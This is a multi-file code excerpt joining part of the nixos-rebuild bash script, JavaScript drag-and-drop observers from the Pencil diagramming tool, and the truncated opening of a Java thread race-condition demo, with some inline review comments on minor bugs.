if [ -z "$action" ]; then showSyntax; fi
# Only run shell scripts from the Nixpkgs tree if the action is
# "switch", "boot", or "test". With other actions (such as "build"),
# the user may reasonably expect that no code from the Nixpkgs tree is
# executed, so it's safe to run nixos-rebuild against a potentially
# untrusted tree.
canRun=
if [ "$action" = switch -o "$action" = boot -o "$action" = test ]; then
canRun=1
fi
# If ‘--upgrade’ or `--upgrade-all` is given,
# run ‘nix-channel --update nixos’.
if [[ -n $upgrade && -z $_NIXOS_REBUILD_REEXEC && -z $flake ]]; then
# If --upgrade-all is passed, or there are other channels that
# contain a file called ".update-on-nixos-rebuild", update them as
# well. Also upgrade the nixos channel.
for channelpath in /nix/var/nix/profiles/per-user/root/channels/*; do
channel_name=$(basename "$channelpath")
if [[ "$channel_name" == "nixos" ]]; then
nix-channel --update "$channel_name"
elif [ -e "$channelpath/.update-on-nixos-rebuild" ]; then
nix-channel --update "$channel_name"
elif [[ -n $upgrade_all ]] ; then
nix-channel --update "$channel_name"
fi
done
fi
# Make sure that we use the Nix package we depend on, not something
# else from the PATH for nix-{env,instantiate,build}. This is
# important, because NixOS defaults the architecture of the rebuilt
# system to the architecture of the nix-* binaries used. So if on an
# amd64 system the user has an i686 Nix package in her PATH, then we
# would silently downgrade the whole system to be i686 NixOS on the
# next reboot.
if [ -z "$_NIXOS_REBUILD_REEXEC" ]; then
export PATH=@nix@/bin:$PATH
fi
# Use /etc/nixos/flake.nix if it exists. It can be a symlink to the
# actual flake.
if [[ -z $flake && -e /etc/nixos/flake.nix ]]; then
flake="$(dirname "$(readlink -f /etc/nixos/flake.nix)")"
fi
# Re-execute nixos-rebuild from the Nixpkgs tree.
# FIXME: get nixos-rebuild from $flake.
if [[ -z $_NIXOS_REBUILD_REEXEC && -n $canRun && -z $fast && -z $flake ]]; then
if p=$(nix-build --no-out-link --expr 'with import <nixpkgs/nixos> {}; config.system.build.nixos-rebuild' "${extraBuildFlags[@]}"); then
export _NIXOS_REBUILD_REEXEC=1
exec $p/bin/nixos-rebuild "${origArgs[@]}"
exit 1
fi
fi
# For convenience, use the hostname as the default configuration to
# build from the flake.
if [[ -n $flake ]]; then
if [[ $flake =~ ^(.*)\#([^\#\"]*)$ ]]; then
flake="${BASH_REMATCH[1]}"
flakeAttr="${BASH_REMATCH[2]}"
fi
if [[ -z $flakeAttr ]]; then
read -r hostname < /proc/sys/kernel/hostname
if [[ -z $hostname ]]; then
hostname=default
fi
flakeAttr="nixosConfigurations.\"$hostname\""
else
flakeAttr="nixosConfigurations.\"$flakeAttr\""
fi
fi
# Resolve the flake.
if [[ -n $flake ]]; then
flake=$(nix "${flakeFlags[@]}" flake info --json "${extraBuildFlags[@]}" "${lockFlags[@]}" -- "$flake" | jq -r .url)
fi
# Find configuration.nix and open editor instead of building.
if [ "$action" = edit ]; then
if [[ -z $flake ]]; then
NIXOS_CONFIG=${NIXOS_CONFIG:-$(nix-instantiate --find-file nixos-config)}
if [[ -d $NIXOS_CONFIG ]]; then
NIXOS_CONFIG=$NIXOS_CONFIG/default.nix
fi
exec ${EDITOR:-nano} "$NIXOS_CONFIG"
else
exec nix "${flakeFlags[@]}" edit "${lockFlags[@]}" -- "$flake#$flakeAttr"
fi
exit 1
fi
# Scratch directory; also holds the shared ssh control sockets below.
tmpDir=$(mktemp -t -d nixos-rebuild.XXXXXX)
SSHOPTS="$NIX_SSHOPTS -o ControlMaster=auto -o ControlPath=$tmpDir/ssh-%n -o ControlPersist=60"
# Close any shared ssh master connections and remove the scratch dir.
cleanup() {
for ctrl in "$tmpDir"/ssh-*; do
ssh -o ControlPath="$ctrl" -O exit dummyhost 2>/dev/null || true
done
rm -rf "$tmpDir"
}
trap cleanup EXIT
# If the Nix daemon is running, then use it. This allows us to use
# the latest Nix from Nixpkgs (below) for expression evaluation, while
# still using the old Nix (via the daemon) for actual store access.
# This matters if the new Nix in Nixpkgs has a schema change. It
# would upgrade the schema, which should only happen once we actually
# switch to the new configuration.
# If --repair is given, don't try to use the Nix daemon, because the
# flag can only be used directly.
if [ -z "$repair" ] && systemctl show nix-daemon.socket nix-daemon.service | grep -q ActiveState=active; then
export NIX_REMOTE=${NIX_REMOTE-daemon}
fi
# First build Nix, since NixOS may require a newer version than the
# current one.
if [ -n "$rollback" -o "$action" = dry-build ]; then
buildNix=
fi
# Print the Nix system tuple for this machine, e.g. "x86_64-linux";
# any ix86 variant is normalised to i686.
nixSystem() {
    machine="$(uname -m)"
    case $machine in
        *i?86*) machine=i686 ;;
    esac
    echo $machine-linux
}
# Map a `uname -m` machine string to the store path of a prebuilt Nix
# (paths substituted at install time); unsupported platforms abort.
prebuiltNix() {
    machine="$1"
    case $machine in
        x86_64)
            echo @nix_x86_64_linux@
            ;;
        *i?86*)
            echo @nix_i686_linux@
            ;;
        *)
            echo "$0: unsupported platform"
            exit 1
            ;;
    esac
}
remotePATH=
# Build a fresh Nix first (unless --fast/--no-build-nix/rollback/dry-build):
# try the NixOS config's nix, then nixpkgs' nix, then known fallback paths.
if [[ -n $buildNix && -z $flake ]]; then
echo "building Nix..." >&2
nixDrv=
if ! nixDrv="$(nix-instantiate '<nixpkgs/nixos>' --add-root $tmpDir/nix.drv --indirect -A config.nix.package.out "${extraBuildFlags[@]}")"; then
if ! nixDrv="$(nix-instantiate '<nixpkgs>' --add-root $tmpDir/nix.drv --indirect -A nix "${extraBuildFlags[@]}")"; then
if ! nixStorePath="$(nix-instantiate --eval '<nixpkgs/nixos/modules/installer/tools/nix-fallback-paths.nix>' -A $(nixSystem) | sed -e 's/^"//' -e 's/"$//')"; then
nixStorePath="$(prebuiltNix "$(uname -m)")"
fi
if ! nix-store -r $nixStorePath --add-root $tmpDir/nix --indirect \
--option extra-binary-caches https://cache.nixos.org/; then
echo "warning: don't know how to get latest Nix" >&2
fi
# Older version of nix-store -r don't support --add-root.
[ -e $tmpDir/nix ] || ln -sf $nixStorePath $tmpDir/nix
if [ -n "$buildHost" ]; then
remoteNixStorePath="$(prebuiltNix "$(buildHostCmd uname -m)")"
remoteNix="$remoteNixStorePath/bin"
if ! buildHostCmd nix-store -r $remoteNixStorePath \
--option extra-binary-caches https://cache.nixos.org/ >/dev/null; then
remoteNix=
echo "warning: don't know how to get latest Nix" >&2
fi
fi
fi
fi
if [ -a "$nixDrv" ]; then
nix-store -r "$nixDrv"'!'"out" --add-root $tmpDir/nix --indirect >/dev/null
if [ -n "$buildHost" ]; then
nix-copy-closure --to "$buildHost" "$nixDrv"
# The nix build produces multiple outputs, we add them all to the remote path
# NOTE(review): ${buildArgs[@]} is a local of nixBuild and is unset at this
# point, so it expands to nothing here — presumably harmless; confirm intent.
for p in $(buildHostCmd nix-store -r "$(readlink "$nixDrv")" "${buildArgs[@]}"); do
remoteNix="$remoteNix${remoteNix:+:}$p/bin"
done
fi
fi
PATH="$tmpDir/nix/bin:$PATH"
fi
# Update the version suffix if we're building from Git (so that
# nixos-version shows something useful).
if [[ -n $canRun && -z $flake ]]; then
if nixpkgs=$(nix-instantiate --find-file nixpkgs "${extraBuildFlags[@]}"); then
suffix=$($SHELL $nixpkgs/nixos/modules/installer/tools/get-version-suffix "${extraBuildFlags[@]}" || true)
if [ -n "$suffix" ]; then
echo -n "$suffix" > "$nixpkgs/.version-suffix" || true
fi
fi
fi
if [ "$action" = dry-build ]; then
extraBuildFlags+=(--dry-run)
fi
# Either upgrade the configuration in the system profile (for "switch"
# or "boot"), or just build it and create a symlink "result" in the
# current directory (for "build" and "test").
if [ -z "$rollback" ]; then
echo "building the system configuration..." >&2
if [ "$action" = switch -o "$action" = boot ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' --no-out-link -A system "${extraBuildFlags[@]}")"
else
outLink=$tmpDir/result
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.toplevel" \
"${extraBuildFlags[@]}" "${lockFlags[@]}" --out-link $outLink
pathToConfig="$(readlink -f $outLink)"
fi
copyToTarget "$pathToConfig"
# Make the new configuration the current generation of $profile.
targetHostCmd nix-env -p "$profile" --set "$pathToConfig"
elif [ "$action" = test -o "$action" = build -o "$action" = dry-build -o "$action" = dry-activate ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A system -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.toplevel" "${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
elif [ "$action" = build-vm ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A vm -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.vm" \
"${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
elif [ "$action" = build-vm-with-bootloader ]; then
if [[ -z $flake ]]; then
pathToConfig="$(nixBuild '<nixpkgs/nixos>' -A vmWithBootLoader -k "${extraBuildFlags[@]}")"
else
nix "${flakeFlags[@]}" build "$flake#$flakeAttr.config.system.build.vmWithBootLoader" \
"${extraBuildFlags[@]}" "${lockFlags[@]}"
pathToConfig="$(readlink -f ./result)"
fi
else
showSyntax
fi
# Copy build to target host if we haven't already done it
if ! [ "$action" = switch -o "$action" = boot ]; then
copyToTarget "$pathToConfig"
fi
else # [ -n "$rollback" ]
if [ "$action" = switch -o "$action" = boot ]; then
targetHostCmd nix-env --rollback -p "$profile"
pathToConfig="$profile"
elif [ "$action" = test -o "$action" = build ]; then
# Recover the generation number of the now-current system so the
# ./result symlink can point at the matching profile link.
systemNumber=$(
targetHostCmd nix-env -p "$profile" --list-generations |
sed -n '/current/ {g; p;}; s/ *\([0-9]*\).*/\1/; h'
)
pathToConfig="$profile"-${systemNumber}-link
if [ -z "$targetHost" ]; then
ln -sT "$pathToConfig" ./result
fi
else
showSyntax
fi
fi
# If we're not just building, then make the new configuration the boot
# default and/or activate it now.
if [ "$action" = switch -o "$action" = boot -o "$action" = test -o "$action" = dry-activate ]; then
if ! targetHostCmd $pathToConfig/bin/switch-to-configuration "$action"; then
echo "warning: error(s) occurred while switching to the new configuration" >&2
exit 1
fi
fi
if [ "$action" = build-vm ]; then
cat >&2 <<EOF
Done. The virtual machine can be started by running $(echo $pathToConfig/bin/run-*-vm)
EOF
fi
|
// Registry of drag-observer constructor functions; one instance of each
// is created per canvas by Pencil.installDragObservers below.
Pencil.dragObserverClasses = [];
Pencil.registerDragObserver = function (observerClass) {
Pencil.dragObserverClasses.push(observerClass);
};
// Instantiate one observer of each registered class and attach it to the
// canvas. The original iterated with for..in, which walks array indices as
// strings and also picks up any enumerable properties added to the array;
// a plain index loop visits exactly the registered classes.
Pencil.installDragObservers = function (canvas) {
    for (var i = 0; i < Pencil.dragObserverClasses.length; i++) {
        var ObserverClass = Pencil.dragObserverClasses[i];
        canvas.dragObservers.push(new ObserverClass(canvas));
    }
};
function ShapeDefDragObserver(canvas) {
this.canvas = canvas;
this.name = "ShapeDefDragObserver";
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
ShapeDefDragObserver.prototype = {
// Declare the drag flavour this observer accepts: shape-definition ids.
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/def");
return flavours;
},
// Insert the dragged shape immediately on enter and start a "fake move"
// so the provisional shape follows the cursor until drop/exit.
onDragEnter: function (event, session) {
var now = new Date().getTime();
// NOTE(review): the constructor sets lastDragEnterTS, not
// lastDragEnterExitEventTS, so delta is NaN on the first enter;
// delta is currently unused anyway.
var delta = now - this.lastDragEnterExitEventTS;
this.lastDragEnterExitEventTS = now;
var defId = event.dataTransfer.getData("pencil/def");
// NOTE(review): duplicate declaration — the value read above is
// immediately overwritten; presumably a leftover from a drag-and-drop
// API migration. Confirm which source is the intended one.
var defId = nsDragAndDrop.getData("pencil/def");
this.dragStart = false;
debug("onDragEnter, defId: " + defId);
var def = CollectionManager.shapeDefinition.locateDefinition(defId);
var loc = this.canvas.getEventLocation(event, "withoutZoom");
this.canvas.insertShapeImpl_(def, new Bound(loc.x, loc.y, null, null));
//fake move marking:
this.canvas.startFakeMove(event);
this.commited = false;
this.hasDrag = true;
},
// Resolve a pending provisional insert when the drag leaves the canvas:
// a (0,0) position is treated as "dropped outside the window" and commits;
// any other position deletes the provisional shape.
exit: function (event) {
//console.log("Event ", event);
this.aboutToDelete = false;
if (this.deleteDiscarded) {
return;
}
if (!this.commited && this.hasDrag) {
var loc = {
x: event.clientX,
y: event.clientY
}
if (loc.x == 0 && loc.y == 0 ) {
this.commited = true;
this.canvas.finishMoving(event);
} else {
this.canvas.deleteSelected();
}
console.log("event: ", event);
// var loc = this.canvas.locDrag;
// var cRect = this.canvas.svg.getBoundingClientRect();
// var aPane = Pencil.controller.applicationPane.contentBody.getBoundingClientRect();
// var pane = {
// x: Math.round(aPane.left),
// y: Math.round(aPane.top),
// w: Math.round(aPane.width),
// h: Math.round(aPane.height)
// }
// //console.log("cRect: ", cRect);
// var rec = {
// x: Math.round(cRect.left),
// y: Math.round(cRect.top),
// w: Math.round(cRect.width),
// h: Math.round(cRect.height)
// }
// console.log("rect", rec);
// console.log("pane", pane);
// console.log("location: ", loc);
// if (loc.x >= rec.x && loc.x <= rec.w
// && loc.y >= rec.y && loc.y <= rec.h
// && loc.x >= pane.x && loc.x <= pane.w
// && loc.y >= pane.y && loc.y <= pane.h) {
// this.commited = true;
// this.canvas.finishMoving(event);
// } else {
// this.canvas.deleteSelected();
// }
}
this.hasDrag = false;
},
onDragStart: function (evt, transferData, action) {
this.dragStart = true;
},
onDragExit: function (event, session) {
this.exit(event);
},
// Forward cursor movement to the canvas while the provisional shape is
// being dragged; duplicate positions are skipped.
onDragOver: function (event, flavour, session) {
// console.log("drag over", event);
if (!this.commited && this.hasDrag) {
if (event.clientX != this._lastScreenX || event.clientY != this._lastScreenY) {
this.canvas.handleMouseMove(event, "fake");
this._lastScreenX = event.clientX;
this._lastScreenY = event.clientY;
}
}
},
// Commit the insert at the drop position.
onDrop: function (event, transferData, session) {
this.commited = true;
this.canvas.finishMoving(event);
}
};
Pencil.registerDragObserver(ShapeDefDragObserver);
function PrivateShapeDefDragObserver(canvas) {
this.canvas = canvas;
this.name = "PrivateShapeDefDragObserver";
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
PrivateShapeDefDragObserver.prototype = {
    // Accepts drags of private-collection shape definitions.
    getSupportedFlavours: function () {
        var set = new FlavourSet();
        set.appendFlavour("pencil/privatedef");
        return set;
    },
    // Insert the dragged private shape provisionally and let it follow the
    // cursor ("fake move") until the drag is dropped or cancelled.
    onDragEnter: function (event, session) {
        var now = new Date().getTime();
        var delta = now - this.lastDragEnterExitEventTS;
        this.lastDragEnterExitEventTS = now;
        // A re-enter right after an exit cancels the pending delete.
        if (this.aboutToDelete) {
            this.deleteDiscarded = true;
            return;
        }
        // Legacy drag-API read kept for parity; the second value is the one used.
        var legacyDefId = event.dataTransfer.getData("pencil/privatedef");
        var defId = nsDragAndDrop.getData("pencil/privatedef");
        var def = PrivateCollectionManager.locateShapeDefinition(defId);
        var where = this.canvas.getEventLocation(event, "withoutZoom");
        this.canvas.insertPrivateShapeImpl_(def, new Bound(where.x, where.y, null, null));
        // Fake-move marking: the shape tracks the cursor from here on.
        this.canvas.startFakeMove(event);
        this.commited = false;
        this.hasDrag = true;
    },
    // Resolve a pending provisional insert once the drag has left:
    // (0,0) coordinates mean "dropped outside the window" -> commit;
    // anything else cancels and removes the provisional shape.
    exit: function (event) {
        this.aboutToDelete = false;
        if (this.deleteDiscarded) return;
        if (!this.commited && this.hasDrag) {
            console.log("event: ", event);
            var x = event.clientX;
            var y = event.clientY;
            if (x == 0 && y == 0) {
                this.commited = true;
                this.canvas.finishMoving(event);
            } else {
                this.canvas.deleteSelected();
            }
        }
        this.hasDrag = false;
    },
    // Defer the actual exit handling briefly so an immediately following
    // drag-enter can cancel the pending delete (see deleteDiscarded above).
    onDragExit: function (event, session) {
        var self = this;
        this.aboutToDelete = true;
        this.deleteDiscarded = false;
        window.setTimeout(function () {
            self.exit(event);
        }, 10);
    },
    // Track cursor movement while the provisional shape is being dragged.
    onDragOver: function (event, flavour, session) {
        if (!this.commited && this.hasDrag) {
            var moved = event.clientX != this._lastScreenX || event.clientY != this._lastScreenY;
            if (moved) {
                this.canvas.handleMouseMove(event, "fake");
                this._lastScreenX = event.clientX;
                this._lastScreenY = event.clientY;
            }
        }
    },
    // Commit the provisional shape at its final location.
    onDrop: function (event, transferData, session) {
        this.commited = true;
        this.canvas.finishMoving(event);
    }
};
Pencil.registerDragObserver(PrivateShapeDefDragObserver);
//====================================================================================
function ShapeShortcutDragObserver(canvas) {
this.canvas = canvas;
this.aboutToDelete = false;
this.deleteDiscarded = false;
this.lastDragEnterTS = new Date().getTime();
}
ShapeShortcutDragObserver.prototype = {
    // Accepts drags of shape shortcuts.
    getSupportedFlavours: function () {
        var set = new FlavourSet();
        set.appendFlavour("pencil/shortcut");
        return set;
    },
    // Insert the shortcut's target shape with its preset property values and
    // start a "fake move" so it follows the cursor until the drag finishes.
    onDragEnter: function (event, session) {
        var now = new Date().getTime();
        var delta = now - this.lastDragEnterExitEventTS;
        this.lastDragEnterExitEventTS = now;
        // Legacy drag-API read kept for parity; the second value is the one used.
        var legacyDefId = event.dataTransfer.getData("pencil/shortcut");
        var defId = nsDragAndDrop.getData("pencil/shortcut");
        var shortcut = CollectionManager.shapeDefinition.locateShortcut(defId);
        var def = shortcut.shape;
        var presetValues = shortcut.propertyMap;
        presetValues._shortcut = shortcut;
        var where = this.canvas.getEventLocation(event, "withoutZoom");
        this.canvas.insertShapeImpl_(def, new Bound(where.x, where.y, null, null), presetValues);
        // Fake-move marking:
        this.commited = false;
        this.hasDrag = true;
        this.canvas.startFakeMove(event);
    },
    // (0,0) coordinates mean "dropped outside the window" -> commit;
    // any other position cancels and removes the provisional shape.
    exit: function (event) {
        this.aboutToDelete = false;
        if (this.deleteDiscarded) return;
        if (!this.commited && this.hasDrag) {
            var x = event.clientX;
            var y = event.clientY;
            if (x == 0 && y == 0) {
                this.commited = true;
                this.canvas.finishMoving(event);
            } else {
                this.canvas.deleteSelected();
            }
        }
        this.hasDrag = false;
    },
    onDragExit: function (event, session) {
        this.exit(event);
    },
    // Track cursor movement while the provisional shape is being dragged.
    onDragOver: function (event, flavour, session) {
        if (!this.commited && this.hasDrag) {
            var moved = event.clientX != this._lastScreenX || event.clientY != this._lastScreenY;
            if (moved) {
                this.canvas.handleMouseMove(event, "fake");
                this._lastScreenX = event.clientX;
                this._lastScreenY = event.clientY;
            }
        }
    },
    // Commit the insert at the drop position.
    onDrop: function (event, transferData, session) {
        this.commited = true;
        this.canvas.finishMoving(event);
    }
};
Pencil.registerDragObserver(ShapeShortcutDragObserver);
//====================================================================================
// Observer that inserts dropped HTML fragments as rich-text panes.
function RichTextDragObserver(canvas) {
// Canvas that dropped rich-text content will be inserted into.
this.canvas = canvas;
}
RichTextDragObserver.prototype = {
    // Accepts dropped HTML fragments ("text/html" flavour).
    getSupportedFlavours : function () {
        var flavours = new FlavourSet();
        flavours.appendFlavour("text/html");
        return flavours;
    },
    onDragOver: function (evt, flavour, session){},
    // Convert the dropped HTML to XHTML and insert it as a rich-text pane.
    // The original wrapped the body in `try { ... } catch (e) { throw e; }`,
    // which is a no-op; the pointless wrapper has been removed.
    onDrop: function (evt, transferData, session) {
        var html = transferData.data;
        var xhtml = Dom.toXhtml(html);
        console.log("html: " + xhtml);
        var textPaneDef = CollectionManager.shapeDefinition.locateDefinition(RichTextXferHelper.SHAPE_DEF_ID);
        if (!textPaneDef) return;
        this.canvas.insertShape(textPaneDef, null);
        if (this.canvas.currentController) {
            this.canvas.currentController.setProperty(RichTextXferHelper.SHAPE_CONTENT_PROP_NAME, new RichText(xhtml));
        }
    }
};
Pencil.registerDragObserver(RichTextDragObserver);
//====================================================================================
// Observer that handles native OS file drops (images, SVG, Pencil documents).
function FileDragObserver(canvas) {
// Canvas that dropped files will be inserted into.
this.canvas = canvas;
}
FileDragObserver.prototype = {
    // Accept native file drops (dataTransfer.files present and non-empty).
    acceptsDataTransfer : function (dataTransfer) {
        return dataTransfer && dataTransfer.files && dataTransfer.files.length > 0;
    },
    onDragOver: function (evt, flavour, session){},
    // Dispatch each dropped file to the handler registered for its extension.
    onDrop: function (evt, dataTransfer, session) {
        for (var i = 0; i < dataTransfer.files.length; i ++) {
            var file = dataTransfer.files[i];
            var fileType = path.extname(file.path);
            // BUG FIX: the original `return`ed here, so a single file without
            // an extension aborted processing of all remaining files; skip
            // just that file instead.
            if (!fileType) continue;
            fileType = fileType.substring(1).toLowerCase();
            var loc = this.canvas.getEventLocation(evt, "withoutZoom");
            if (FileDragObserver.fileTypeHandler[fileType]) {
                FileDragObserver.fileTypeHandler[fileType](this.canvas, file.path, loc);
            }
        }
    }
};
// Shape-definition id used when inserting dropped SVG files.
FileDragObserver.SVG_SHAPE_DEF_ID = "Evolus.Common:SVGImage";
// Per-extension handlers invoked by FileDragObserver.onDrop.
FileDragObserver.fileTypeHandler = {
// Insert a bitmap file as an image shape, scaled down to at most 90% of the
// canvas; `transparent` switches the fill to fully transparent white.
_handleImageFile: function (canvas, url, loc, transparent) {
try {
var def = CollectionManager.shapeDefinition.locateDefinition(PNGImageXferHelper.SHAPE_DEF_ID);
if (!def) return;
canvas.insertShape(def, new Bound(loc.x, loc.y, null, null));
if (!canvas.currentController) return;
var controller = canvas.currentController;
// Applied asynchronously once the image has been loaded and measured.
var handler = function (imageData) {
var r = imageData.w / (canvas.width * 0.9);
r = Math.max(r, imageData.h / (canvas.height * 0.9));
if (r < 1) r = 1;
var dim = new Dimension(imageData.w / r, imageData.h / r);
controller.setProperty("imageData", imageData);
controller.setProperty("box", dim);
if (transparent) {
controller.setProperty("fillColor", Color.fromString("#ffffff00"));
}
canvas.invalidateEditors();
};
ImageData.fromExternalToImageData(url, handler);
} catch (e) {
Console.dumpError(e);
}
},
png: function (canvas, url, loc) {
debug(url);
this._handleImageFile(canvas, url, loc, "transparent");
},
jpg: function (canvas, url, loc) {
this._handleImageFile(canvas, url, loc);
},
gif: function (canvas, url, loc) {
this._handleImageFile(canvas, url, loc, "transparent");
},
// SVG files are read from disk and routed through handleSVGData.
svg: function (canvas, url, loc) {
var file = fileHandler.getFileFromURLSpec(url).QueryInterface(Components.interfaces.nsILocalFile);
var fileContents = FileIO.read(file, XMLDocumentPersister.CHARSET);
FileDragObserver.handleSVGData(fileContents, canvas, loc);
},
// Pencil document files (.ep/.epz/.epgz) are opened rather than inserted.
ep: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
},
epz: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
},
epgz: function (canvas, url) {
Pencil.documentHandler.loadDocument(url);
}
};
// Parse raw SVG markup into a DOM and delegate the insertion to
// handleSVGDOM; parse/insert errors are logged, not rethrown.
FileDragObserver.handleSVGData = function (svg, canvas, loc) {
    try {
        var parsed = new DOMParser().parseFromString(svg, "text/xml");
        FileDragObserver.handleSVGDOM(parsed, canvas, loc);
    } catch (err) {
        Console.dumpError(err);
    }
}
// Scratch node for the disabled measuring code below; currently unused.
FileDragObserver.svgMeasuringNode = null;
// Insert an SVG DOM as an SVGImage shape centred on `loc` (defaults to the
// canvas's last mouse position). Strips the outer <svg> element, re-wraps
// its children in nested <g> elements, and optionally scales the result
// down to fit the canvas.
FileDragObserver.handleSVGDOM = function (dom, canvas, loc) {
if (!loc) {
loc = canvas.lastMouse || {x: 10, y: 10};
}
var fromOC = dom.documentElement.getAttributeNS(PencilNamespaces.p, "ImageSource");
var width = Svg.getWidth(dom);
var height = Svg.getHeight(dom);
console.log("WxH", [width, height]);
var dx = 0;
var dy = 0;
//parse the provided svg viewBox
if (dom.documentElement.viewBox) {
var viewBox = dom.documentElement.viewBox.baseVal;
if (viewBox.width > 0 && viewBox.height > 0) {
width = viewBox.width;
height = viewBox.height;
dx = viewBox.x;
dy = viewBox.y;
}
}
// Move every child of the root <svg> into a fresh <g> wrapper.
var g = dom.createElementNS(PencilNamespaces.svg, "g");
while (dom.documentElement.childNodes.length > 0) {
var firstChild = dom.documentElement.firstChild;
dom.documentElement.removeChild(firstChild);
g.appendChild(firstChild);
}
if (fromOC) {
g.setAttributeNS(PencilNamespaces.p, "p:ImageSource", fromOC);
// OpenClipart content may reuse element ids across documents; renew them.
if (fromOC == "OpenClipart.org") {
Dom.renewId(g, /([a-zA-Z0-9]+)/i);
}
}
// if (!FileDragObserver.svgMeasuringNode) {
// var div = document.createElement("div");
// div.style.cssText = "position: absolute; left: 0px; top: 0px; width: 5px; height: 5px; overflow: hidden; visibility: hidden;";
// document.body.appendChild(div);
// var svg = document.createElementNS(PencilNamespaces.svg, "svg:svg");
// svg.setAttribute("version", "1.0");
// svg.setAttribute("width", 10);
// svg.setAttribute("height", 10);
//
// div.appendChild(svg);
// FileDragObserver.svgMeasuringNode = svg;
// }
//
// Dom.empty(FileDragObserver.svgMeasuringNode);
// FileDragObserver.svgMeasuringNode.appendChild(g);
// FileDragObserver.svgMeasuringNode.removeChild(g);
//g.setAttribute("transform", "translate(" + (0 - dx) + "," + (0 - dy) + ")");
var g0 = dom.createElementNS(PencilNamespaces.svg, "g");
g0.appendChild(g);
dom.replaceChild(g0, dom.documentElement);
var def = CollectionManager.shapeDefinition.locateDefinition(FileDragObserver.SVG_SHAPE_DEF_ID);
canvas.insertShape(def, new Bound(loc.x - width / 2, loc.y - height / 2, null, null));
if (canvas.currentController) {
var controller = canvas.currentController;
var w = width;
var h = height;
var maxWidth = canvas.width * 0.9;
var maxHeight = canvas.height * 0.9;
// Optionally scale down to at most 90% of the canvas, keeping aspect ratio.
if (Config.get("clipartbrowser.scale") == true && (w > maxWidth || h > maxHeight)) {
var r = Math.max(w / maxWidth, h / maxHeight);
w /= r;
h /= r;
}
var dim = new Dimension(w, h);
controller.setProperty("svgXML", new PlainText(Dom.serializeNode(dom.documentElement)));
controller.setProperty("box", dim);
controller.setProperty("originalDim", new Dimension(width, height));
}
}
Pencil.registerDragObserver(FileDragObserver);
// Observer that inserts dragged raw SVG markup ("image/svg+xml").
function SVGDragObserver(canvas) {
// Canvas that dropped SVG content will be inserted into.
this.canvas = canvas;
}
SVGDragObserver.prototype = {
    // Accepts raw SVG markup drags.
    getSupportedFlavours: function () {
        var set = new FlavourSet();
        set.appendFlavour("image/svg+xml");
        return set;
    },
    onDragOver: function (evt, flavour, session) {},
    // Parse the dropped SVG text and insert it at the drop location.
    onDrop: function (evt, transferData, session) {
        var markup = transferData.data;
        var where = this.canvas.getEventLocation(evt, "withoutZoom");
        FileDragObserver.handleSVGData(markup, this.canvas, where);
    }
};
Pencil.registerDragObserver(SVGDragObserver);
// Observer that inserts images dragged as a "pencil/png" URL payload.
function PNGDragObserver(canvas) {
// Canvas that dropped images will be inserted into.
this.canvas = canvas;
}
PNGDragObserver.prototype = {
// Accepts drags carrying a "pencil/png" URL payload.
getSupportedFlavours : function () {
var flavours = new FlavourSet();
flavours.appendFlavour("pencil/png");
return flavours;
},
onDragOver: function (evt, flavour, session){},
onDrop: function (evt, transferData, session) {
var url = transferData.data;
var loc = this.canvas.getEventLocation(evt, "withoutZoom");
this._handleImageFile(this.canvas, url, loc, "transparent");
},
// Insert the image at `loc`, optionally scaled down to the configured
// clipart-browser maximum size; `transparent` switches the fill to fully
// transparent white.
_handleImageFile: function (canvas, url, loc, transparent) {
try {
var def = CollectionManager.shapeDefinition.locateDefinition(PNGImageXferHelper.SHAPE_DEF_ID);
if (!def) return;
// Default to linking (not embedding) images on first use.
if (Config.get("document.EmbedImages") == null) {
Config.set("document.EmbedImages", false);
}
var embedImages = Config.get("document.EmbedImages")
canvas.insertShape(def, new Bound(loc.x, loc.y, null, null));
if (!canvas.currentController) return;
var controller = canvas.currentController;
// Runs asynchronously once the image has been loaded and measured.
var handler = function (imageData) {
var w = imageData.w;
var h = imageData.h;
var maxWidth = Config.get("clipartbrowser.scale.width");
var maxHeight = Config.get("clipartbrowser.scale.height");
// Seed the scale limits with 200px defaults on first use.
if (!maxWidth) {
maxWidth = 200;
Config.set("clipartbrowser.scale.width", 200);
}
if (!maxHeight) {
maxHeight = 200;
Config.set("clipartbrowser.scale.height", 200);
}
if (Config.get("clipartbrowser.scale") == true && (w > maxWidth || h > maxHeight)) {
if (w > h) {
h = h / (w / maxWidth);
w = maxWidth;
} else {
w = w / (h / maxHeight);
h = maxHeight;
}
}
var dim = new Dimension(w, h);
controller.setProperty("imageData", imageData);
controller.setProperty("box", dim);
if (transparent) {
controller.setProperty("fillColor", Color.fromString("#ffffff00"));
}
};
if (!embedImages) {
ImageData.fromUrl(url, handler);
} else {
ImageData.fromUrlEmbedded(url, handler);
}
// NOTE(review): invalidateEditors() runs before the async handler above
// has applied its properties (FileDragObserver._handleImageFile calls it
// inside the handler instead) — confirm this ordering is intentional.
canvas.invalidateEditors();
} catch (e) {
Console.dumpError(e);
}
}
};
Pencil.registerDragObserver(PNGDragObserver);
|
<gh_stars>0
public class FirstBlood {
// Shared counter incremented by every worker thread.
// NOTE(review): the increment in A.run() is a non-atomic read-modify-write
// with no synchronization, so the printed total is usually below 10000.
// The "wait for it ..." output suggests this race is a deliberate
// demonstration — confirm before "fixing" with AtomicInteger/synchronized.
public static int count = 0;
public static void main(String args[]) {
int numberofThreads = 10000;
A[] threads = new A[numberofThreads];
// Start all worker threads first ...
for (int i = 0; i < numberofThreads; i++) {
threads[i] = new A();
threads[i].start();
}
// ... then wait for each to finish before reading the counter.
try {
